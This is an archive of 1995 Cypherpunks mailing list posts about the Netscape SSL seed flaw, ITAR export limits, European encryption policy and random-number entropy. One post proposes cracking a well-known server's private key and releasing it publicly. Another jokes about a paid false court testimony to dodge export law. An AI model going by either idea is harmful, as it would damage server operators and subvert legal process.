John. This whole Netscape thing is good for us, good for Netscape (in the long run), and good for raising the awareness of the importance of strong crypto. It also underscores the need for "tiger teams" to validate software, much as the Pentium debacle of last fall underscored the need for even more detailed checking of designs. It's clear now that 1000 ravenous Cypherpunks, or some fraction of them, are eager to "crack" the next big product, and this will hopefully make for better and stronger software. --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From nsb at radiomail.net Thu Sep 21 09:05:31 1995 From: nsb at radiomail.net (NSB's Portable (via RadioMail)) Date: Thu, 21 Sep 95 09:05:31 PDT Subject: [NOISE] "hacker" was: first virtual "security" Message-ID: At 2:03 AM 9/21/95 -0400, Ian Goldberg wrote: >In article <0kMA2EqMc50eMEb4Yx at nsb.fv.com>, >Nathaniel Borenstein wrote: >>If an SSL-like scheme were in wide use world-wide, the hacker who just >>made a name for himself by breaking SSL could instead have gone down in > >Ugh. That word again. I'm only 22, but I'm old enough to remember >when there were people called "crackers", and being called a "hacker" >was a _good_ thing. Hey, this guy didn't steal anything, and he publicized the hole. He wasn't a criminal, he was a good guy. That's why I called him a hacker. -- NB From landon at netcom.com Thu Sep 21 09:14:13 1995 From: landon at netcom.com (Landon Dyer) Date: Thu, 21 Sep 95 09:14:13 PDT Subject: FROM A FRIEND . . . (the joys of boating) Message-ID: <199509211600.JAA10128@netcom19.netcom.com> >On 21 Sep 1995, Jeff Weinstein wrote: >> My understanding is that we can not >> export our US-only product, except to canada - for the use of canadian >> citizens. I also believe that it is illegal for anyone except US citizens, >> permanent residents of the US (green card holders) and Canadian citizens >> to use it, even within the US. I'm not a lawyer, and I've not read >> all of ITAR myself, so I could be totally wrong... > > All the same, if anyone wants an easy and economical >way to get around ITAR, have someone do your cypto software development >just north of the border (Vancouver's just north of Seattle and close >enough to Silicon Valley, with excellent net-access) or at least just >publish it here first. here's a possible bullshit wrinkle. i'm not a lawyer, but one of my bosses was, once. said boss owned a boat that was of canadian registry. he was a canadian citizen with a green card. he *claimed* that, even when docked in the SF bay area, his boat was technically considered canadian territory, due to some maritime law malarky. US authorities theoretically had to go through various hoops to legally board his vessel. i wouldn't try to halt a SWAT team, or even the local fuzz, with this tidbit of legal gaga. but doing crypto development on such a vessel might hold up in court for something as squishy as ITAR. naturally, commuting to canada is probably a *lot* cheaper than owning a boat. the uninitiated have little idea what these holes- in-the-water really cost.... :-) -landon (returning to lurk-mode) From tcmay at got.net Thu Sep 21 09:18:02 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 09:18:02 PDT Subject: Entropy vs Random Bits Message-ID: At 11:50 PM 9/20/95, David Van Wie wrote: >I've been watching the debate and discussion unfold on usable sources of >random data from environments, user actions, etc. I have a vocabulary >question (and something of a bone to pick as a mathematician and physicist). Well, I was trained as a physicist also, but am completely comfortable with the Shannon definition of information-theoretic entropy. In fact, through my readings about entropy in computations (cites below), I now view traditional thermodynamic entropy as a special case of information theory! >Usually, the term "entropy" is being used to characterize one of two >different things: (i) random data, as in "300 bits of entropy," and (ii) the >"randomness" of data (i.e. high degree of variance in a statistic drawn from >it), as in "you can find a lot of entropy in the low order bits of a timed >interval between keystrokes." I suspect that there are other shades of >meaning intended in other uses as well. > >This is odd. The term entropy describes an aspect of thermodynamic >equlibrium in physical systems. Although sometimes used as a synonym for >"random," that definition is vernacular, not technical. In fact, there is >no meaningful relationship between "entropy" and random data of the type >described in the postings related to seed values. In the presense of a >perfectly suitable and precise mathematical term (i.e. random), why invent >new terms? Why use them to mean at least two different things? Entropy has been used with an information theory context since the 1950s, by Claude Shannon and others. I disagree that there is "no meaningful relationship between "entropy" and random data of the type described in the postings related to seed values." The bits of entropy we are talking about are the "bits derived from a physical process or a user action which are effectively from a random process." (Granted, the internal thoughts of a user swirling the mouse around are not quite as "random" as, say, alpha decay, but for all intents and purposes no "prediction" can be made of the mouse motions, at certain levels of detail, and the bits dervived are in fact effectively random. We are not "living in a state of sin," to paraphrase Von Neumann, in using these bits and assuming them to be random.) Good books on the incredibly fascinating aspects of information theory, and expecially algorithmic information theory: * Cover and Thomas, "Elements of Information Theory." A good textbook on information theory, covering gambling (!), prediction, and the Chaitin-Kolmogoroff outlook. * Chaitin, Gregory, "Algorithmic Information Theory." A bit dense to read, and Chaitin has written several more popular accounts for "Scientific American" and similar places. * Zurek, Wojciech, editor, "Complexity, Entropy, and the Physics of Infromation." This collection of great articles shows the role of entropy in infromation theory, and why the thermodynamic definition is essentially a variant of the more fundamental information-theoretic definition. Enjoy! --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From iagoldbe at csclub.uwaterloo.ca Thu Sep 21 09:35:06 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Thu, 21 Sep 95 09:35:06 PDT Subject: Fraud Fraut Froth In-Reply-To: <199509211130.HAA20039@light.lightlink.com> Message-ID: <43s46q$3qs@calum.csclub.uwaterloo.ca> In article <199509211130.HAA20039 at light.lightlink.com>, wrote: >NY Times, Sept 21, 1995. > >Fraud Can Flourish Without the Internet > >To the Editor: > [snip] > >Or is the banking industry whipping up hysteria among >purchasers to curb fraud losses? Was the work of those >graduate students funded by someone -- directly or indirectly? >If so, by whom? A banking consortium? A high-tech company >working on some patentable security scheme? The work we did was not funded by anyone. If someone out there would care to rectify this situation, he can let us know. :-) - Ian "Grad students are not notoriously wealthy in this country, either, right?" From patrick at Verity.COM Thu Sep 21 09:38:36 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 21 Sep 95 09:38:36 PDT Subject: netscape bug Message-ID: <9509211634.AA18472@cantina.verity.com> Vlad Nuri said (with some exerpting) > > none of the articles mention that the cracker must have login access > to the computer that the random numbers are generated on. is this true? > does the code require knowledge of the PID etc. that can only be obtained > by a login to the system that the netscape session is running on? It's been noted on this list before that some programs give uid information out...sendmail comes to mind...this GREATLY narrows the search for a pid. > P.M. notes that anywhere there is a data-driven buffer overflow (which > he suspects are all over netscape) he can get code to execute anything > he wants. this reminds me of the > Morris internet worm that ran exactly the same way. it used a > bug in the finger demon that caused a string buffer overwrite > (via strcpy, instead of strncpy) to execute customized code. > > my question: I have not seen the specifics of how this works. does > this require specialized knowledge of the native machine language on the > host machine? or is it just used to cause something like a core dump > to get a command line or something like that? It requires knowledge of how the stack is set up and of assembler for the target. Most people in computer science know at least one assembler and could easily add enough of another to launch an attack like this. I did one once to attack one of my programs as an example for a class. Please don't overestimate the difficulty of this attack or underestimate the number of folks out there that are qualified to launch it. It's just that most of us would rather be writing constructive code:) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From sameer at c2.org Thu Sep 21 09:42:02 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 09:42:02 PDT Subject: Fraud Fraut Froth In-Reply-To: <199509211130.HAA20039@light.lightlink.com> Message-ID: <199509211636.JAA12440@infinity.c2.org> > > Or is the banking industry whipping up hysteria among > purchasers to curb fraud losses? Was the work of those > graduate students funded by someone -- directly or indirectly? > If so, by whom? A banking consortium? A high-tech company > working on some patentable security scheme? > Do free t-shirts count as funding? -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From wb8foz at netcom.com Thu Sep 21 09:52:22 1995 From: wb8foz at netcom.com (David Lesher) Date: Thu, 21 Sep 95 09:52:22 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) Message-ID: <199509211649.MAA11243@netcom22.netcom.com> ********************************************************** > SUBJECT: Euroclipper > Apologies if this is old news to you folks, but thought I should > pass it on. Date: Thu, 21 Sep 1995 00:42:39 -0400 Subject: IP: Council of Europe proposes to outlaw strong encryption According to an article in `Communications Week International', the 34-nation Council of Europe has agreed to outlaw strong encryption products which do not make keys available to governments. The article, `Euro-Clipper chip scheme proposed', is on the front page of the magazine's issue 151, dated 18th September, which arrived in my mail this morning. It relates that the policy was approved on the 8th September at Strasbourg by the Council, and coincides with an attempt by the European Commission to propose a pan-European encryption standard. The Council - unlike the Commission - has no statutory powers to enforce its recommendations. However, Peter Csonka, the chairman of the committee that drafted the document (and an administrative officer at the Council's division of crime problems) says that `it is rare for countries to reject Council of Europe recommendations'. The proposal would make telecomms operators responsible for decrypting traffic and supplying it to governments when asked. It would also `change national laws to enable judicial authorities to chase hackers across borders'. Opposition to this measure was expressed by Mike Strezbek, VP responsible for European telecomms at JP Morgan, who said that his organisation `will challenge any attempt to limit the power of our network encryption technologies very strongly'. Czonka said that the Council had given consideration to business interests but had tries to strike a balance between privacy and justice. However, `it remains possible that cryptography is available to the public which cannot be deciphered,' his document says. `This might lead to the conclusion to put restrictions on the possession, distribution, or use of cryptography.' Apparently another international organisation, the OECD, has called a conference of its members in December to devise a strategy on encryption. I for one will be making clear to my MP that his stand on this issue will determine how I cast my ballot at the next election. I note that John Major stated in a 1994 parliamentary written reply to David Shaw MP that the government did not intend to legislate on data encryption. I am disppointed that government policy has changed to the point of supporting the Council of Europe, and that this change has sneaked through during the parliamentary recess. Ross Anderson ------- End of Forwarded Message -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close...........(v)301 56 LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead........vr vr vr vr.................20915-1433 From s675570 at aix2.uottawa.ca Thu Sep 21 09:53:32 1995 From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca) Date: Thu, 21 Sep 95 09:53:32 PDT Subject: FROM A FRIEND . . . (or the joys of boating) Message-ID: On Thu, 21 Sep 1995, Landon Dyer wrote: > naturally, commuting to canada is probably a *lot* cheaper than > owning a boat. the uninitiated have little idea what these holes- > in-the-water really cost.... :-) *Loud* chuckles. Who says you have to *own* the boat? (haha) A suitably paid Canadian boat-captain could easily testify that you arrived every day to the boat with your trusty laptop, to develop your software within Canada. The disk with your saved code on it never left the boat. When you finished your development, you used a borrowed satellite phone to call up your ISP in Canada (we're talking physical Canada, not virtual, maritime, and bullshit Canada) to post your code and uuencoded executables to sci.cript, and alt.test. And since you used a satellite phone, for the modem transmission, no US phone lines were used (a cellphone wouldn't do). Of course you wouldn't actually have to do any of this. The gentleman just has to say it in court. The truth, the whole truth and nothing but. From tcmay at got.net Thu Sep 21 10:04:39 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 10:04:39 PDT Subject: Persistent Services Needed Message-ID: One of the problems we're facing with "Cypherpunks" services is that they are catch-as-catch-can, or, bluntly, "flaky." Archive sites stop being archives, remailers vanish overnight (*), and other experiments pop up and then vanish with regularity. (My favorite example, and one which always makes me smile, is the example of a remailer in Europe a couple of years ago which became inoperative with the message: "The foo remailer will stop operating tonight because I have to take my laptop with me for the summer to Portugal.") I'm not criticizing these folks. Rather, I'm just saying something pretty obvious, that _persistence_ is important. This probably means commercialization, or formalized business relationships. With such persistent business set-ups, "the show must go on." Another reason for digital money. --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 21 10:17:24 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 10:17:24 PDT Subject: FROM A FRIEND . . . (the joys of boating) Message-ID: At 4:00 PM 9/21/95, Landon Dyer wrote: > here's a possible bullshit wrinkle. i'm not a lawyer, but one of my >bosses was, once. > > said boss owned a boat that was of canadian registry. he was a >canadian citizen with a green card. he *claimed* that, even when >docked in the SF bay area, his boat was technically considered >canadian territory, due to some maritime law malarky. US authorities >theoretically had to go through various hoops to legally board his >vessel. > > i wouldn't try to halt a SWAT team, or even the local fuzz, with >this tidbit of legal gaga. but doing crypto development on such a >vessel might hold up in court for something as squishy as ITAR. I'm skeptical of this, as boating friends of mine tell me they are much more easily boarded by the various water.cops who check for compliance with navigation laws, with drug laws, with Customs laws, etc. Within the 3-mile limits, or further out (?), broad discretion is given to the water.cops who tell you to "Prepare to be boarded." That a ship or boat is of Panamanian, Liberian, or even Candian registry does not seem to have any effect on enforcement of drug-smuggling, gun-running, waste-dumping, or reckless-manouvering laws. I've already expressed my views on the hype surrounding the "This T-Shirt Has Been Declared to be a Munition" hoopla, so I won't draw the obvious inference about whether someone wearing an RSA-in-Perl t-shirt while scrubbing their decks will be shot on sight. (Was Randy Weaver's wife wearing an illegal t-shirt? Hmmmhhh, many conspiracy angles here!) --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From joe_tardo at genmagic.com Thu Sep 21 10:23:32 1995 From: joe_tardo at genmagic.com (Joe Tardo) Date: Thu, 21 Sep 95 10:23:32 PDT Subject: netscape bug Message-ID: Reply to: RE>netscape bug "Vladimir Z. Nuri" writes: >I am willing to bet that the netscape bug would have been fixed quickly if it >had been quietly brought to their attention, without the blaring media >lights (I enjoy the media circus as much as the next guy, but on the >other hand, doing some things quietly may actually advance the cypherpunk >cause further than by making a noisy hullaballoo in cyberspace). I can't speak for Netscape in particular, but from bitter personal experience (in a previous life) I would be more willing to bet that bringing such a flaw to management's attention would raise the priority a bit to perhaps just below whatever their equivalent of the 'cut line' is. The rationale: "we are so resource limited; can't just keep it under wraps and fix it in the next release?" just rings in my ears. I can really empathize with what the developers at Netscape must be going through, but the 'social good' of raising security flaws to the level of the front page of the NYT is hard to deny. Rather than saying "security through obscurity is bad" you can point to a precedent of the consequences of being found out. --Joe From cwe at Csli.Stanford.EDU Thu Sep 21 10:28:51 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Thu, 21 Sep 95 10:28:51 PDT Subject: Euro-Clipper In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU> Message-ID: <199509211728.KAA19754@Csli.Stanford.EDU> | I don't think I've seen this here (but it was on a bunch of security | newsgoups...) | | - Ian It's time for a European wing of the cypherpunks list. Europeans - unite! :-( And they even have the indecency to immediately propose to outlaw 'strong encryption for the people' - no grace period there. /Christian From cwe at Csli.Stanford.EDU Thu Sep 21 10:35:26 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Thu, 21 Sep 95 10:35:26 PDT Subject: NSA and Netscape Crack In-Reply-To: <43qrpq$gd5@tera.mcom.com> Message-ID: <199509211735.KAA19988@Csli.Stanford.EDU> | Believe it or not we don't like being trashed for | being stupid all over the net, print media, and TV. As far as I know | the NSA have not given us any advice about how to make our system | stronger. I've heard rumors that they were quite upset when they | learned that SSLs 40-bit RC4 was actually 40-bit secret and 88-bit salt. It is dangerous that the general reaction is that of 'them being stupid', since that will prevent others from stepping forward and reveal their own 'holes'. I decree that 'all holes look stupid once located'. But 'any non-trivially large program is bound to have holes' => 'all programmers are stupid' (except me, because I found the hole?) Jeff, your and Netscape prompt response to this is what counts - holes will always be uncovered, it's the time before they are patched that really matters. /Christian From patrick at Verity.COM Thu Sep 21 10:36:16 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 21 Sep 95 10:36:16 PDT Subject: netscape's response (source code review) Message-ID: <9509211732.AA18490@cantina.verity.com> > > It is becoming gradually clearer in cryptanalysis that you can't test > security of pieces in isolation. Their interaction with the > surrounding code and protocols is key to their security. Ross I don't think this is a new realization, attacks on crpyto systems have always considered the whole system. _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From sameer at c2.org Thu Sep 21 11:30:56 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 11:30:56 PDT Subject: Persistent Services Needed In-Reply-To: Message-ID: <199509211825.LAA23576@infinity.c2.org> c2.org has been around for more than a year. The recent publicity we've been getting should hopefully mean that we'll actually start making a profit and be around for quite some time longer. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From rr251070 at hvcc.edu Thu Sep 21 11:31:35 1995 From: rr251070 at hvcc.edu (Anarchist) Date: Thu, 21 Sep 95 11:31:35 PDT Subject: Has anyone seen the CatMan (catburgler)? Message-ID: I am trying to find someone who calls himself catman or catburgler. In nov. 94 He was serving in Albany County Jail in NY. If anyone has any information that may help like his E-mail address, Id really like to hear from you... My address is below. ********************************************** Email: rr251070 at academ.hvcc.edu Email alias: Anarchist At: Hudsen Valley Community College 80 Vandenburgh Ave Troy, NY 12180 ---------------------------------------------- Anarchy- A movement to rid society of structured government, and to create a system based on co-operation and non-violence! ********************************************** From sameer at c2.org Thu Sep 21 11:37:06 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 11:37:06 PDT Subject: The Next Hack Message-ID: <199509211832.LAA24086@infinity.c2.org> Now that we've seen that Netscape is doing a good job towards trying to fix the hole that Ian and David have uncovered, it's time to start looking at new things. Given the recent post to the www-security list that was forwarded here, it seems like just replacing the server may not work for all the secure servers out there-- keys may have to be replaced as well. Let's find out. Proposal for action: 1) Reverse-engineer a server to see if the keygen phase uses a weak RNG seed. -- if so, determine the exact algorithim. 2) Organize a net-wide search over the space of the RNG seed to crack the private key of some well known secure server. 3) Release the private key to the net. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tomw at orac.engr.sgi.com Thu Sep 21 11:46:24 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Thu, 21 Sep 95 11:46:24 PDT Subject: Netscape closes up 1 3/8 today! Message-ID: <199509211846.LAA04164@orac.engr.sgi.com> In article , carolann at censored.org (Censored Girls Anonymous) writes: > Lookit that! 416 trades and 11 times there was more > buying pressure than selling pressure.. > The rumors of bug fix are outweighing the facts of the crack! > I am totally amazed! But think company insiders are probably > supporting the stock. Holding up better than ascii armor, it is. I think it probably has more to do with the fact that the name "Netscape" has been on the front page of every major newspaper in the US. I guess bad press is better than no press at all. And the press hasn't even been that bad. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From cwe at Csli.Stanford.EDU Thu Sep 21 11:53:38 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Thu, 21 Sep 95 11:53:38 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509210958.TAA10764@sweeney.cs.monash.edu.au> Message-ID: <199509211852.LAA22259@Csli.Stanford.EDU> | > Of course you have to be very careful, as you say. Did you see my | > problem-section in the original letter? I included it above. | ... [the referenced section elided by jirib] ... | | If I only ever give out a hash of my seed, and only ever *add* any received | info to my seed (and stir it in well), how can anyone find out anything? | (Apart from hash weaknesses.) Giving out contribution: MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote Taking in contribution : my_seed = my_seed XOR ((select_low_bits(remote_contrib, contrib_width) << contrib_area) You also need to keep track of who has contributed what, and how much. This might become a problem if you don't have a safe authentification mechanism, like baseing the tracking on the IP-numbers etc. But I don't believe this is a real problem, since you always contribute 'entropy', not exact values. You need to know the exact state of the random generator to be able to predict how your contribution will affect the generator. The boot-strap stage is actually the big problem still. But if the initial stages are 'random enough' to withstand a total crack, I guess the randomness gathered will increase rapidly, and increase the safety a lot. | The only thing that remains is that I cannot really count on a stranger | to actually give me something truly random. In fact, since at least | one other person knows it, I shouldn't count any entropy from it at all. | | However, if I get e bits from each of n servers, and k of them are rogue, | then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative | estimate of k/n, this should be acceptable. | | In any case, accepting donations of entropy cannot possibly reduce the | amount of entropy I have, can it? This isn't a problem as I see it, he'll only know what bits he flipped, not the actual state. I guess someone could mount an attack on the remote_contrib, finding the part of my_seed by bruting the remote_contrib that I submitted. But even if that is done, you'll only know a small part of the total seed. And the remote end can't choose which segment of my_seed that will be revealed. I also see a problem if an attacker is controlling the whole environment, but this is no different from the original problem, and a lot more unlikely. | > and that you should only give out approximately the same amount of | > randomness to the neighbour, as you point out below. | ... | | I'm not sure I follow this one. Why? | | If the neighbour is willing to trust me for more, and cannot possibly | deduce my seed from the numbers ('cause it's a strong 1-way hash), | the only thing it costs me is CPU time - it'd cost me more to keep | track of who asked for how much when. Well, the reason would be that if someone bruted your contribution, they would still have to guess the remaining part. Double safe! :-) | ... | > My approach solves part of the problem of "the observable local | > environment" problem. | ... | | Then again, you can always ping. With a well-chosen target, you get | 10 bits raw from the first packet... Perhaps about 7 or 8 of actual | usable entropy (and before you flame me, ping melb.dialix.oz.au). Yes, but if one assumes that the algorithm to gather the seed is known, its quite possible for someone else to do it at the same time as you do it, or even observe your ping packet req/reply. And how do you determine which 'random host' to ping? | Part of this is that once the sources of randomness are sufficiently | diverse, it's just easier for an attacker to modify your s/w. | Especially if you never throw out your seed, so that all your interactions | since the beginning are unfathomably stirred into your current key. Yes, I believe this is important too. /Christian From bdavis at dg.thepoint.net Thu Sep 21 11:55:19 1995 From: bdavis at dg.thepoint.net (Brian Davis) Date: Thu, 21 Sep 95 11:55:19 PDT Subject: NSA and Netscape Crack In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Timothy C. May wrote: > > By the way, if we count our own Matt Blaze's work on exposing weaknesses of > the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks > achievement," then the Cypherpunks have actually played a dominant role in > cracking these recent standards. (Not to mention the RC4 code postings, the > various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations, > etc.) > > Well done, of course! > Absolutely. And why not enter the PR fray by publicizing those successes? Press release/identify persons for followups/etc. (All with permission/participation of those who did it). Certainly, Cypherpunks has gotten press lately, and what I've seen has been good press. Capitalize on it. Finally, I've got to say that, as someone new to the concepts discussed here, I found it extremely cool to read about the latest break here and then see it in the news a day or two later. EBD > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From joe_tardo at genmagic.com Thu Sep 21 11:59:48 1995 From: joe_tardo at genmagic.com (Joe Tardo) Date: Thu, 21 Sep 95 11:59:48 PDT Subject: Please send me SSL prob Message-ID: Reply to: RE>>Please send me SSL problems... Jeff: The name chosen for SSL was, perhaps, unfortunate and misleading, but should not get in the way of the kind of service it provides. I keep combing the spec looking for socket-like api's, and so far have not found any :-). > I've looked at >what it takes to make some existing protocols work with SSL, and I'm not >convinced that its always appropriate. For example FTP and RCMD use >multiple connections, which is a royal pain. Doesn't HTTP use a new connection for every GET? > If a secure IP standard emerges that is widely deployed and provides >similar services, I don't see why SSL couldn't just go away (this is my >opinion, not an official position of netscape). The ipsec people are currently debating what it means to do replay detection on an unreliable datagram service, what it means to authenticate individual users in a layer that only knows how to name host endpoints, how a protocol specification deals with how policy would be set for mixed encryption service requirements, etc. This is not the first time these points have been debated in the history of the universe, nor the first attempt at a 'one size fits all' security protocol. I, personally, would not be too quick to expect IP security to solve all of your problems, but it will do a better job on, say, host-to-host disclosure protection. It will, however, require new kernel code or low-level driver or hardware hacks, which simultaneously provide the better protection and a barrier to security deployment for a product like Netscape's. Now, how about fixing SSL's keying so it has perfect forward secrecy? -Joe From shields at tembel.org Thu Sep 21 12:00:37 1995 From: shields at tembel.org (Michael Shields) Date: Thu, 21 Sep 95 12:00:37 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft In-Reply-To: <199509210637.XAA11478@hammerhead.com> Message-ID: > Now, this is all expected to change, to become more harmonious > with the rest of the world. The changes that I've heard are > 1) Go to first-to-file instead of first-to-invent [...] Does this mean that prior art would no longer invalidate a patent? -- Shields. From shields at tembel.org Thu Sep 21 12:03:13 1995 From: shields at tembel.org (Michael Shields) Date: Thu, 21 Sep 95 12:03:13 PDT Subject: Munitions shirt (again) In-Reply-To: Message-ID: > There is nothing in the ITAR that refers to ``machine-readable'' so > there is no need to interpret that term. The issue is that it has been formally used as the criterion that distinguishes "technical data" from "defense articles". See Phil Karn's CJ requests on the _Applied Crypography_ book and floppy. -- Shields. From stewarts at ix.netcom.com Thu Sep 21 12:07:47 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 21 Sep 95 12:07:47 PDT Subject: Project: a standard cell random number generator Message-ID: <199509211907.MAA18413@ix.ix.netcom.com> At 02:50 PM 9/20/95 -0700, you wrote: > In this sense, NSA ought to be *encouraging* Intel and >IBM and Motorola to put "generate random bits" instructions into >their instruction sets... Is _that_ what was going on with Pentium division? Less seriously, thoguh, a UART might be a good place to add a random number source, since it may be able to extract randomness from communication line jitter, is usually an easily replaceable part on most machines, and communicates at a higher speed than you're likely to need for most randomness applications. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Thu Sep 21 12:08:04 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 21 Sep 95 12:08:04 PDT Subject: MIME Message-ID: <199509211907.MAA18407@ix.ix.netcom.com> At 01:24 AM 9/21/95 +0000, shields at tembel.org (Michael Shields) wrote: >> >I think that it must be the content-type that is causing problems, >> Yes, I agree. Make it something like ASCII text >But it's not text/plain. It's PGP'ed text/plain. The only way to >indicate this in MIME is with a content-type. (Yes, they're working on >a general way to encapsulate encryption.) Part of the problem is that application/pgp is being used both for encrypted data and also for clearsigned data, which really have different handling needs. With clearsigned, you might want to read it, but might also want to PGP it. One possibility is to do multipart messages with the body in one part and a detached signature in another. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From an5877 at anon.penet.fi Thu Sep 21 12:38:49 1995 From: an5877 at anon.penet.fi (deadbeat) Date: Thu, 21 Sep 95 12:38:49 PDT Subject: Fraud Can Flourish Without the Internet Message-ID: <9509211915.AA28667@anon.penet.fi> -----BEGIN PGP SIGNED MESSAGE----- The New York Times Letters Thursday, September 21, 1995 Fraud Can Flourish Without the Internet To the Editor: Your Sept. 19 front-page article on the discovery by two University of California graduate students of a flaw in Netscape, the software used for purchases over the Internet's World Wide Web, raises a number of obvious questions. First, who needs high tech to per- petrate fraud? Any unscrupulous commercial employee could use or sell your credit card number without employing technology. Every time you hand your card to a waiter in a restaurant, it disap- pears for several minutes. The de- partment store clerks and gas sta- tion attendants you deal with also have access to your card number. How secure is that? Ever give your credit card num- ber over the phone to make a purchase from a mail-order house? Or to secure a reservation at a hotel? Who's to say that the em- ployees you're speaking with are honest? Or that your phone is no tapped? Or theirs? I shop on the Internet; I may get ripped off. What's my liability? Fifty bucks -- sames as the other scenarios I've described. That's in my credit agreement with the card issuer. So why all the hoopla? Is credit card fraud significantly more preva- lent on the Internet than in other modes of purchasing? Or is the banking industry whip- ping up hysteria among purchasers to curb fraud losses? Was the work of those graduate students funded by someone -- directly or indirect- ly? If so, by whom? A banking consortium? A high-tech company working on some patentable security scheme? ROBERT HERRIG Peekskill, N.Y., Sept. 19, 1995 The writer is a systems consultant. DEADBEAT for the I.L.F. -----BEGIN PGP 